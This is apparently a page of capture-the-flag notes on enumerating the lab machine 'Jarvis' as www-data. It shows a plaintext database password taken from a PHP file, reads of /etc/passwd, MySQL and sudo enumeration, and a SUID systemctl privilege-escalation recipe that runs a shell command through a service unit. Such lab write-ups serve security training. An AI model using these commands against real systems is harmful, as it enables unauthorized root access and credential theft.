6 box enum www-data

CMD: cat connection.php
<?php
$connection=new mysqli('127.0.0.1','DBadmin','imissyou','hotel');
?>

www-data@jarvis:/var/www/html$ cat /etc/passwd | grep sh
root:x:0:0:root:/root:/bin/bash
pepper:x:1000:1000:,,,:/home/pepper:/bin/bash

www-data@jarvis:/var/www/html$ mysql -u DBadmin -p
Server version: 10.1.37-MariaDB-0+deb9u1 Debian 9.6

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| hotel              |
| information_schema |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)

# hotel only has 1 table: room; nothing else in it.

www-data@jarvis:/var/www/html$ sudo -l
Matching Defaults entries for www-data on jarvis:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on jarvis:
    (pepper : ALL) NOPASSWD: /var/www/Admin-Utilities/simpler.py

SuidEnum

[~] Custom SUID Binaries (Interesting Stuff)
------------------------------
/bin/systemctl
------------------------------

[#] SUID Binaries in GTFO bins list (Hell Yeah!)
------------------------------
 -~> https://gtfobins.github.io/gtfobins/systemctl/#suid
------------------------------

[&] Manual Exploitation (Binaries which create files on the system)
------------------------------
[&] Systemctl ( /bin/systemctl )
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "id > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
/bin/systemctl link $TF
/bin/systemctl enable --now $TF
------------------------------

Previous7 www-data > pepper Next5 phpMyAdmin 4.8 LFI

Last updated 4 years ago